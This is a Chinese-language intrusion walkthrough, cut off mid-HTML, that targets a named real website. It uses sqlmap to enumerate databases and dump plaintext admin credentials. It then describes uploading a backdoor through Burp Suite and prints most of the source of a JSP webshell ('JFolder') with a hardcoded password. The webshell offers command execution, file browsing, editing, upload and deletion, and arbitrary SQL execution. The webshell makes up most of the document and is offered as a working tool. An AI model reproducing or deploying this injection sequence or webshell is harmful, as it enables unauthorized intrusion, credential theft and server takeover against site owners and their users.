工具介绍
此次测试用到已下工具,F4ck工具包,Acunetix Web Vulnerability Scanner 8扫描工具,burpsuite抓包工具,sql注入工具 sqlmap.py ,搜狐浏览器, SwitchySharp 代理工具。
1.首先找到测试网站这里拿http://www.cqys.cn
然后进行Acunetix Web Vulnerability Scanner 8扫描
找到注入点
2.我们就是用sqlmap工具注入
http://www.cqys.cn/view_xwxx.shtml?id=45521
使用sql语句查询
sqlmap -u “http://url/news?id=1″ �Cdbms “Mysql” �Cusers # dbms 指定数 据库类型 sqlmap -u “http://url/news?id=1″ �Cusers #列数据库用户 sqlmap -u “http://url/news?id=1″ �Cdbs#列数据库 sqlmap -u “http://url/news?id=1″ �Cpasswords #数据库用户密码 sqlmap -u “http://url/news?id=1″ �Cpasswords-U root -v 0 #列出指定用户 数据库密码 sqlmap -u “http://url/news?id=1″ �Cdump -C “password,user,id” -T “tablename”-D “db_name” �Cstart 1 �Cstop 20 #列出指定字段,列出20 条 sqlmap -u “http://url/news?id=1″ �Cdump-all -v 0 #列出所有数据库所有表 sqlmap -u “http://url/news?id=1″ �Cprivileges #查看权限 sqlmap -u “http://url/news?id=1″ �Cprivileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ �Cis-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ �Croles #枚举数据库用户角色 sqlmap -u “http://url/news?id=1″ �Cudf-inject #导入用户自定义函数(获取 系统权限!) sqlmap -u “http://url/news?id=1″ �Cdump-all �Cexclude-sysdbs -v 0 #列 出当前库所有表 sqlmap -u “http://url/news?id=1″ �Cunion-cols #union 查询表记录 sqlmap -u “http://url/news?id=1″ �Ccookie “COOKIE_VALUE”#cookie注入 sqlmap -u “http://url/news?id=1″-b #获取banner信息 sqlmap -u “http://url/news?id=1″ �Cdata “id=3″#post注入
参数很多,学习的请查阅http://www.myhack58.com/Article/html/3/7/2013/39050_4.htm
我是看这个学习的
sqlmap 语句
Sqlmap -u http://www.cqys.cn/view_xwxx.shtml?id=44981 --dbs
查出数据库CQYS
Sqlmap -u http://www.cqys.cn/view_xwxx.shtml?id=44981 -D CQYS --tables 列出表格
一个个测试得到管理后台用户和密码
而且还是明文的我去。
找到管理后台账号和密码登陆后台得到权限
3.使用代理上传后门
4.使用burpsuite抓包改包上传
<%@ page contentType="text/html; charset=GBK" %> <%@ page import="java.io.*"%> <%@ page import="java.util.Map"%> <%@ page import="java.util.HashMap"%> <%@ page import="java.nio.charset.Charset"%> <%@ page import="java.util.regex.*"%> <%@ page import="java.sql.*"%> <%! private String _password = "admin"; private String _encodeType = "GB2312"; private int _sessionOutTime = 20; private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; private Connection _dbConnection = null; private Statement _dbStatement = null; private String _url = null; public boolean validate(String password) { if (password.equals(_password)) { return true; } else { return false; } } public String HTMLEncode(String str) { str = str.replaceAll(" ", " "); str = str.replaceAll("<", "<"); str = str.replaceAll(">", ">"); str = str.replaceAll("\r\n", "<br>"); return str; } public String Unicode2GB(String str) { String sRet = null; try { sRet = new String(str.getBytes("ISO8859_1"), _encodeType); } catch (Exception e) { sRet = str; } return sRet; } public String exeCmd(String cmd) { Runtime runtime = Runtime.getRuntime(); Process proc = null; String retStr = ""; InputStreamReader insReader = null; char[] tmpBuffer = new char[1024]; int nRet = 0; try { proc = runtime.exec(cmd); insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { retStr += new String(tmpBuffer, 0, nRet); } insReader.close(); retStr = HTMLEncode(retStr); } catch (Exception e) { retStr = "<font color=\"red\">bad command \"" + cmd + "\"</font>"; } finally { return retStr; } } public String pathConvert(String path) { String sRet = path.replace('\\', '/'); File file = new File(path); if (file.getParent() != null) { if (file.isDirectory()) { if (! sRet.endsWith("/")) sRet += "/"; } } else { if (! sRet.endsWith("/")) sRet += "/"; } return sRet; } public String strCut(String str, int len) { String sRet; len -= 3; if (str.getBytes().length <= len) { sRet = str; } else { try { sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; } catch (Exception e) { sRet = str; } } return sRet; } public String listFiles(String path, String curUri) { File[] files = null; File curFile = null; String sRet = null; int n = 0; boolean isRoot = path.equals(""); path = pathConvert(path); try { if (isRoot) { files = File.listRoots(); } else { try { curFile = new File(path); String[] sFiles = curFile.list(); files = new File[sFiles.length]; for (n = 0; n < sFiles.length; n ++) { files[n] = new File(path + sFiles[n]); } } catch (Exception e) { sRet = "<font color=\"red\">bad path \"" + path + "\"</font>"; } } if (sRet == null) { sRet = "\n"; sRet += "<script language=\"javascript\">\n"; sRet += "var selectedFile = null;\n"; sRet += "<!--\n"; sRet += "function createFolder() {\n"; sRet += " var folderName = prompt(\"请输入目录名\", \"\");\n"; sRet += " if (folderName != null && folderName != false && ltrim(folderName) != \"\") {\n"; sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFolder&folderName=\" + folderName + \"" + "\";\n"; sRet += " }\n"; sRet += "}\n"; sRet += "\n"; sRet += "function createFile() {\n"; sRet += " var fileName = prompt(\"请输入文件名\", \"\");\n"; sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n"; sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFile&fileName=\" + fileName + \"" + "\";\n"; sRet += " }\n"; sRet += "}\n"; sRet += "\n"; sRet += "function selectFile(obj) {\n"; sRet += " if (selectedFile != null)\n"; sRet += " selectedFile.style.backgroundColor = \"#FFFFFF\";\n"; sRet += " selectedFile = obj;\n"; sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n"; sRet += "}\n"; sRet += "\n"; sRet += "function change(obj) {\n"; sRet += " if (selectedFile != obj)\n"; sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n"; sRet += "}\n"; sRet += "\n"; sRet += "function restore(obj) {\n"; sRet += " if (selectedFile != obj)\n"; sRet += " obj.style.backgroundColor = \"#FFFFFF\";\n"; sRet += "}\n"; sRet += "\n"; sRet += "function showUpload() {\n"; sRet += " up.style.visibility = \"visible\";\n"; sRet += "}\n"; sRet += "\n"; sRet += "function copyFile() {\n"; sRet += " var toPath = prompt(\"请输入要复制到的目录(绝对路径)\", \"\");\n"; sRet += " if (toPath != null && toPath != false && ltrim(toPath) != \"\") {\n"; sRet += " document.fileList.action = \"" + curUri + "&curPath=" + path + "&fsAction=copyto&dstPath=" + "\" + toPath;\n"; sRet += " document.fileList.submit();\n"; sRet += " }\n"; sRet += "}\n"; sRet += "\n"; sRet += "function rename() {\n"; sRet += " var count = 0;\n"; sRet += " var selected = -1;\n"; sRet += " for (var i = 0; i < document.fileList.filesDelete.length; i ++) {\n"; sRet += " if (document.fileList.filesDelete[i].checked) {\n"; sRet += " count ++;\n"; sRet += " selected = i;\n"; sRet += " }\n"; sRet += " }\n"; sRet += " if (count > 1)\n"; sRet += " alert(\"不能重命名多个文件\");\n"; sRet += " else if (selected == -1)\n"; sRet += " alert(\"没有选中要重命名的文件\");\n"; sRet += " else {\n"; sRet += " var newName = prompt(\"请输入新文件名\", \"\");\n"; sRet += " if (newName != null && newName != false && ltrim(newName) != \"\") {\n"; sRet += " window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=rename&newName=\" + newName + \"&fileRename=\" + document.fileList.filesDelete[selected].value;"; sRet += " }\n"; sRet += " }\n"; sRet += "}\n"; sRet += "\n"; sRet += "//-->\n"; sRet += "</script>\n"; sRet += "<table width=\"100%\" border=\"0\" cellpadding=\"2\" cellpadding=\"1\">\n"; sRet += " <form enctype=\"multipart/form-data\" method=\"post\" name=\"upload\" action=\"" + curUri + "&curPath=" + path + "&fsAction=upload" + "\">\n"; if (curFile != null) { sRet += " <tr>\n"; sRet += " <td colspan=\"4\" valign=\"middle\">\n"; sRet += " <a href=\"" + curUri + "&curPath=" + (curFile.getParent() == null ? "" : pathConvert(curFile.getParent())) + "\">上级目录</a> "; sRet += "<a href=\"#\" onclick=\"javascript:createFolder()\">创建目录</a> "; sRet += "<a href=\"#\" onclick=\"javascript:createFile()\">新建文件</a> "; sRet += "<a href=\"#\" onclick=\"javascript:document.fileList.submit();\">删除</a> "; sRet += "<a href=\"#\" onclick=\"javascript:copyFile()\">复制</a> "; sRet += "<a href=\"#\" onclick=\"javascript:rename()\">重命名</a> "; sRet += "<a href=\"#\" onclick=\"javascript:showUpload()\">上传文件</a>\n"; sRet += "<span style=\"visibility: hidden\" id=\"up\"><input type=\"file\" value=\"上传\" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input type=\"submit\" value=\"上传\" class=\"button\"></span>\n"; sRet += " </td>\n"; sRet += " </tr>\n"; } sRet += "</form>\n"; sRet += " <form name=\"fileList\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=deleteFile" + "\">\n"; for (n = 0; n < files.length; n ++) { sRet += " <tr onclick=\"javascript: selectFile(this)\" onmouseover=\"javascript: change(this)\" onmouseout=\"javascript: restore(this)\" style=\"cursor:hand;\">\n"; if (! isRoot) { sRet += " <td width=\"5%\" align=\"center\"><input type=\"checkbox\" name=\"filesDelete\" value=\"" + pathConvert(files[n].getPath()) + "\" /></td>\n"; if (files[n].isDirectory()) { sRet += " <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\"><" + strCut(files[n].getName(), 50) + "></a></td>\n"; } else { sRet += " <td><a title=\"" + files[n].getName() + "\">" + strCut(files[n].getName(), 50) + "</a></td>\n"; } sRet += " <td width=\"15%\" align=\"center\">" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<<a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "&fsAction=open" + "\">edit</a>>" : "") + "</td>\n"; sRet += " <td width=\"15%\" align=\"center\">" + files[n].length() + "</td>\n"; } else { sRet += " <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">" + pathConvert(files[n].getPath()) + "</a></td>\n"; } sRet += " </tr>\n"; } sRet += " </form>\n"; sRet += "</table>\n"; } } catch (SecurityException e) { sRet = "<font color=\"red\">security violation, no privilege.</font>"; } return sRet; } public boolean isTextFile(String extName) { int i; boolean bRet = false; if (! extName.equals("")) { for (i = 0; i < _textFileTypes.length; i ++) { if (extName.equals(_textFileTypes[i])) { bRet = true; break; } } } else { bRet = true; } return bRet; } public String getExtName(String fileName) { String sRet = ""; int nLastDotPos; fileName = pathConvert(fileName); nLastDotPos = fileName.lastIndexOf("."); if (nLastDotPos == -1) { sRet = ""; } else { sRet = fileName.substring(nLastDotPos + 1); } return sRet; } public String browseFile(String path) { String sRet = ""; File file = null; FileReader fileReader = null; path = pathConvert(path); try { file = new File(path); fileReader = new FileReader(file); String fileString = ""; char[] chBuffer = new char[1024]; int ret; sRet = "<script language=\"javascript\">\n"; while ((ret = fileReader.read(chBuffer, 0, 1024)) != -1) { fileString += new String(chBuffer, 0, ret); } sRet += "var wnd = window.open(\"about:blank\", \"_blank\", \"width=600, height=500\");\n"; sRet += "var doc = wnd.document;\n"; sRet += "doc.write(\"" + "aaa" + "\");\n"; sRet += "</script>\n"; } catch (IOException e) { sRet += "<script language=\"javascript\">\n"; sRet += "alert(\"打开文件" + path + "失败\");\n"; sRet += "</script>\n"; } return sRet; } public String openFile(String path, String curUri) { String sRet = ""; boolean canOpen = false; int nLastDotPos = path.lastIndexOf("."); String extName = ""; String fileString = null; File curFile = null; path = pathConvert(path); if (nLastDotPos == -1) { canOpen = true; } else { extName = path.substring(nLastDotPos + 1); canOpen = isTextFile(extName); } if (canOpen) { try { fileString = ""; curFile = new File(path); FileReader fileReader = new FileReader(curFile); char[] chBuffer = new char[1024]; int nRet; while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { fileString += new String(chBuffer, 0, nRet); } fileReader.close(); } catch (IOException e) { fileString = null; sRet = "<font color=\"red\">不能打开文件\"" + path + "\"</font>"; } catch (SecurityException e) { fileString = null; sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>"; } } else { sRet = "<font color=\"red\">file \"" + path + "\" is not a text file, can't be opened in text mode</font>"; } if (fileString != null) { sRet += "<script language=\"javascript\">"; sRet += "<!--\n"; sRet += "function saveAs() {\n"; sRet += " var fileName = prompt(\"请输入文件名\", \"\");\n"; sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n"; sRet += " document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n"; sRet += " document.openfile.submit();\n"; sRet += " }\n"; sRet += "}\n"; sRet += "//-->\n"; sRet += "</script>\n"; sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n"; sRet += " <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=save" + "\">\n"; sRet += " <tr>\n"; sRet += " <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">上级目录</a>]</td>\n"; sRet += " </tr>\n"; sRet += " <tr>\n"; sRet += " <td align=\"center\">\n"; sRet += " <textarea name=\"fileContent\" cols=\"80\" rows=\"32\">\n"; sRet += fileString; sRet += " </textarea>\n"; sRet += " </td>\n"; sRet += " </tr>\n"; sRet += " <tr>\n"; sRet += " <td align=\"center\"><input type=\"submit\" class=\"button\" value=\"保存\" /> <input type=\"button\" class=\"button\" value=\"另存为\" onclick=\"javascript:saveAs()\" /></td>\n"; sRet += " </tr>\n"; sRet += " </form>\n"; sRet += "</table>\n"; } return sRet; } public String saveFile(String path, String curUri, String fileContent) { String sRet = ""; File file = null; path = pathConvert(path); try { file = new File(path); if (! file.canWrite()) { sRet = "<font color=\"red\">文件不可写</font>"; } else { FileWriter fileWriter = new FileWriter(file); fileWriter.write(fileContent); fileWriter.close(); sRet = "文件保存成功,正在返回,请稍候……\n"; sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />\n"; } } catch (IOException e) { sRet = "<font color=\"red\">保存文件失败</font>"; } catch (SecurityException e) { sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>"; } return sRet; } public String createFolder(String path, String curUri, String folderName) { String sRet = ""; File folder = null; path = pathConvert(path); try { folder = new File(path + folderName); if (folder.exists() && folder.isDirectory()) { sRet = "<font color=\"red\">\"" + path + folderName + "\"目录已经存在</font>"; } else { if (folder.mkdir()) { sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + folderName + "\" />"; } else { sRet = "<font color=\"red\">创建目录\"" + folderName + "\"失败</font>"; } } } catch (SecurityException e) { sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>"; } return sRet; } public String createFile(String path, String curUri, String fileName) { String sRet = ""; File file = null; path = pathConvert(path); try { file = new File(path + fileName); if (file.createNewFile()) { sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + fileName + "&fsAction=open" + "\" />"; } else { sRet = "<font color=\"red\">\"" + path + fileName + "\"文件已经存在</font>"; } } catch (SecurityException e) { sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>"; } catch (IOException e) { sRet = "<font color=\"red\">创建文件\"" + path + fileName + "\"失败</font>"; } return sRet; } public String deleteFile(String path, String curUri, String[] files2Delete) { String sRet = ""; File tmpFile = null; try { for (int i = 0; i < files2Delete.length; i ++) { tmpFile = new File(files2Delete[i]); if (! tmpFile.delete()) { sRet += "<font color=\"red\">删除\"" + files2Delete[i] + "\"失败</font><br>\n"; } } if (sRet.equals("")) { sRet = "删除成功,正在返回,请稍候……\n"; sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />"; } } catch (SecurityException e) { sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>\n"; } return sRet; } public String saveAs(String path, String curUri, String fileContent) { String sRet = ""; File file = null; FileWriter fileWriter = null; try { file = new File(path); if (file.createNewFile()) { fileWriter = new FileWriter(file); fileWriter.write(fileContent); fileWriter.close(); sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />"; } else { sRet = "<font color=\"red\">文件\"" + path + "\"已经存在</font>"; } } catch (IOException e) { sRet = "<font color=\"red\">创建文件\"" + path + "\"失败</font>"; } return sRet; } public String uploadFile(ServletRequest request, String path, String curUri) { String sRet = ""; File file = null; InputStream in = null; path = pathConvert(path); try { in = request.getInputStream(); byte[] inBytes = new byte[request.getContentLength()]; int nBytes; int start = 0; int end = 0; int size = 1024; String token = null; String filePath = null; // // 把输入流读入一个字节数组 // while ((nBytes = in.read(inBytes, start, size)) != -1) { start += nBytes; } in.close(); // // 从字节数组中得到文件分隔符号 // int i = 0; byte[] seperator; while (inBytes[i] != 13) { i ++; } seperator = new byte[i]; for (i = 0; i < seperator.length; i ++) { seperator[i] = inBytes[i]; } // // 得到Header部分 // String dataHeader = null; i += 3; start = i; while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { i ++; } end = i - 1; dataHeader = new String(inBytes, start, end - start + 1); // // 得到文件名 // token = "filename=\""; start = dataHeader.indexOf(token) + token.length(); token = "\""; end = dataHeader.indexOf(token, start) - 1; filePath = dataHeader.substring(start, end + 1); filePath = pathConvert(filePath); String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); // // 得到文件内容开始位置 // i += 4; start = i; /* boolean found = true; byte[] tmp = new byte[seperator.length]; while (i <= inBytes.length - 1 - seperator.length) { for (int j = i; j < i + seperator.length; j ++) { if (seperator[j - i] != inBytes[j]) { found = false; break; } else tmp[j - i] = inBytes[j]; } if (found) break; i ++; }*/ // // 偷懒的办法 // end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; // // 保存为文件 // File newFile = new File(path + fileName); newFile.createNewFile(); FileOutputStream out = new FileOutputStream(newFile); //out.write(inBytes, start, end - start + 1); out.write(inBytes, start, end - start + 1); out.close(); sRet = "<script language=\"javascript\">\n"; sRet += "alert(\"文件上传成功" + fileName + "\");\n"; sRet += "</script>\n"; } catch (IOException e) { sRet = "<script language=\"javascript\">\n"; sRet += "alert(\"文件上传失败\");\n"; sRet += "</script>\n"; } sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />"; return sRet; } public boolean fileCopy(String srcPath, String dstPath) { boolean bRet = true; try { FileInputStream in = new FileInputStream(new File(srcPath)); FileOutputStream out = new FileOutputStream(new File(dstPath)); byte[] buffer = new byte[1024]; int nBytes; while ((nBytes = in.read(buffer, 0, 1024)) != -1) { out.write(buffer, 0, nBytes); } in.close(); out.close(); } catch (IOException e) { bRet = false; } return bRet; } public String getFileNameByPath(String path) { String sRet = ""; path = pathConvert(path); if (path.lastIndexOf("/") != -1) { sRet = path.substring(path.lastIndexOf("/") + 1); } else { sRet = path; } return sRet; } public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { String sRet = ""; int i; path = pathConvert(path); dstPath = pathConvert(dstPath); for (i = 0; i < files2Copy.length; i ++) { if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { sRet += "<font color=\"red\">文件\"" + files2Copy[i] + "\"复制失败</font><br/>"; } } if (sRet.equals("")) { sRet = "文件复制成功,正在返回,请稍候……"; sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />"; } return sRet; } public boolean isFileName(String fileName) { boolean bRet = false; Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); Matcher m = p.matcher(fileName); bRet = m.matches(); return bRet; } public String renameFile(String path, String curUri, String file2Rename, String newName) { String sRet = ""; path = pathConvert(path); file2Rename = pathConvert(file2Rename); try { File file = new File(file2Rename); newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; File newFile = new File(newName); if (! file.exists()) { sRet = "<font color=\"red\">文件\"" + file2Rename + "\"不存在</font>"; } else { file.renameTo(newFile); sRet = "文件重命名成功,正在返回,请稍候……"; sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />"; } } catch (SecurityException e) { sRet = "<font color=\"red\">安全问题导致文件\"" + file2Rename + "\"复制失败</font>"; } return sRet; } public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { boolean bRet = true; String driverName = ""; if (dbServer.equals("")) dbServer = "localhost"; try { if (dbType.equals("sqlserver")) { driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; if (dbPort.equals("")) dbPort = "1433"; _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; } else if (dbType.equals("mysql")) { driverName = "com.mysql.jdbc.Driver"; if (dbPort.equals("")) dbPort = "3306"; _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; } else if (dbType.equals("odbc")) { driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; } else if (dbType.equals("oracle")) { driverName = "oracle.jdbc.driver.OracleDriver"; _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; } else if (dbType.equals("db2")) { driverName = "com.ibm.db2.jdbc.app.DB2Driver"; _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; } Class.forName(driverName); } catch (ClassNotFoundException e) { bRet = false; } return bRet; } public boolean DBConnect(String User, String Password) { boolean bRet = false; if (_url != null) { try { _dbConnection = DriverManager.getConnection(_url, User, Password); _dbStatement = _dbConnection.createStatement(); bRet = true; } catch (SQLException e) { bRet = false; } } return bRet; } public String DBExecute(String sql) { String sRet = ""; if (_dbConnection == null || _dbStatement == null) { sRet = "<font color=\"red\">数据库没有正常连接</font>"; } else { try { if (sql.toLowerCase().substring(0, 6).equals("select")) { ResultSet rs = _dbStatement.executeQuery(sql); ResultSetMetaData rsmd = rs.getMetaData(); int colNum = rsmd.getColumnCount(); int colType; sRet = "sql语句执行成功,返回结果<br>\n"; sRet += "<table align=\"center\" border=\"0\" bgcolor=\"#CCCCCC\" cellpadding=\"2\" cellspacing=\"1\">\n"; sRet += " <tr bgcolor=\"#FFFFFF\">\n"; for (int i = 1; i <= colNum; i ++) { sRet += " <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n"; } sRet += " </tr>\n"; while (rs.next()) { sRet += " <tr bgcolor=\"#FFFFFF\">\n"; for (int i = 1; i <= colNum; i ++) { colType = rsmd.getColumnType(i); sRet += " <td>"; switch (colType) { case Types.BIGINT: sRet += rs.getLong(i); break; case Types.BIT: sRet += rs.getBoolean(i); break; case Types.BOOLEAN: sRet += rs.getBoolean(i); break; case Types.CHAR: sRet += rs.getString(i); break; case Types.DATE: sRet += rs.getDate(i).toString(); break; case Types.DECIMAL: sRet += rs.getDouble(i); break; case Types.NUMERIC: sRet += rs.getDouble(i); break; case Types.REAL: sRet += rs.getDouble(i); break; case Types.DOUBLE: sRet += rs.getDouble(i); break; case Types.FLOAT: sRet += rs.getFloat(i); break; case Types.INTEGER: sRet += rs.getInt(i); break; case Types.TINYINT: sRet += rs.getShort(i); break; case Types.VARCHAR: sRet += rs.getString(i); break; case Types.TIME: sRet += rs.getTime(i).toString(); break; case Types.DATALINK: sRet += rs.getTimestamp(i).toString(); break; } sRet += " </td>\n"; } sRet += " </tr>\n"; } sRet += "</table>\n"; rs.close(); } else { if (_dbStatement.execute(sql)) { sRet = "sql语句执行成功"; } else { sRet = "<font color=\"red\">sql语句执行失败</font>"; } } } catch (SQLException e) { sRet = "<font color=\"red\">sql语句执行失败</font>"; } } return sRet; } public void DBRelease() { try { if (_dbStatement != null) { _dbStatement.close(); _dbStatement = null; } if (_dbConnection != null) { _dbConnection.close(); _dbConnection = null; } } catch (SQLException e) { } } ///////////////////////////////////////////////////////////////////////////////////////////////////////////////// class JshellConfig { private String _jshellContent = null; private String _path = null; public JshellConfig(String path) throws JshellConfigException { _path = path; read(); } private void read() throws JshellConfigException { try { FileReader jshell = new FileReader(new File(_path)); char[] buffer = new char[1024]; int nChars; _jshellContent = ""; while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { _jshellContent += new String(buffer, 0, nChars); } jshell.close(); } catch (IOException e) { throw new JshellConfigException("打开文件失败"); } } public void save() throws JshellConfigException { FileWriter jshell = null; try { jshell = new FileWriter(new File(_path)); char[] buffer = _jshellContent.toCharArray(); int start = 0; int size = 1024; for (start = 0; start < buffer.length - 1 - size; start += size) { jshell.write(buffer, start, size); } jshell.write(buffer, start, buffer.length - 1 - start); } catch (IOException e) { new JshellConfigException("写文件失败"); } finally { try { jshell.close(); } catch (IOException e) { } } } public void setPassword(String password) throws JshellConfigException { Pattern p = Pattern.compile("\\w+"); Matcher m = p.matcher(password); if (! m.matches()) { throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); } p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); //return HTMLEncode(_jshellContent); } public void setEncodeType(String encodeType) throws JshellConfigException { Pattern p = Pattern.compile("[A-Za-z0-9]+"); Matcher m = p.matcher(encodeType); if (! m.matches()) { throw new JshellConfigException("编码格式只能是字母和数字的组合"); } p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); //return HTMLEncode(_jshellContent); } public void setSessionTime(String sessionTime) throws JshellConfigException { Pattern p = Pattern.compile("\\d+"); Matcher m = p.matcher(sessionTime); if (! m.matches()) { throw new JshellConfigException("session超时时间只能填数字"); } p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序体已经被非法修改"); } _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); //return HTMLEncode(_jshellContent); } public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { Pattern p = Pattern.compile("\\w+"); Matcher m = null; int i; String fileTypes = ""; String tmpFileTypes = ""; for (i = 0; i < textFileTypes.length; i ++) { m = p.matcher(textFileTypes[i]); if (! m.matches()) { throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); } if (i != textFileTypes.length - 1) fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; else fileTypes += "\"" + textFileTypes[i] + "\""; } for (i = 0; i < _textFileTypes.length; i ++) { if (i != _textFileTypes.length - 1) tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; else tmpFileTypes += "\"" + _textFileTypes[i] + "\""; } p = Pattern.compile(tmpFileTypes); m = p.matcher(_jshellContent); if (! m.find()) { throw new JshellConfigException("程序文件已经被非法修改"); } _jshellContent = m.replaceAll(fileTypes); //return HTMLEncode(_jshellContent); } public String getContent() { return HTMLEncode(_jshellContent); } } class JshellConfigException extends Exception { public JshellConfigException(String message) { super(message); } } %> <html> <head> <title>[FC※HK]小组专用</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head> <style> body { font-size: 14px; font-family: 宋体; background-color: #CCCCCC; } td { font-size: 14px; font-family: 宋体; } input.textbox { border: black solid 1; font-size: 12px; height: 18px; } input.button { font-size: 12px; font-family: 宋体; border: black solid 1; } td.datarows { font-size: 14px; font-family: 宋体; height: 25px; } textarea { border: black solid 1; } .inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;} .table1 {BORDER:gray 0px ridge;} .td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;} .tr1 {BACKGROUND-color:gray } </style> <script language="JavaScript"> <!-- function ltrim(str) { while (str.indexOf(0) == " ") str = str.substring(1); return str; } function changeAction(obj) { obj.submit(); } //--> </script> <body> <% session.setMaxInactiveInterval(_sessionOutTime * 60); if (request.getParameter("password") == null && session.getAttribute("password") == null) { // show the login form //================================================================================================ %> <div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:14px;top:200px"> <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center"> <tr> <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0"> <tr> <TD align="left"><FONT face="webdings" color="#ffffff"> 8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>管理登录 :::...</b></font></TD> <TD align="right"><FONT color="#d2d8ec"><b>JFolder</b>_By_<b>hack520</b></FONT></TD> </tr> <form name="f1" method="post"> <input type="hidden" name="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" 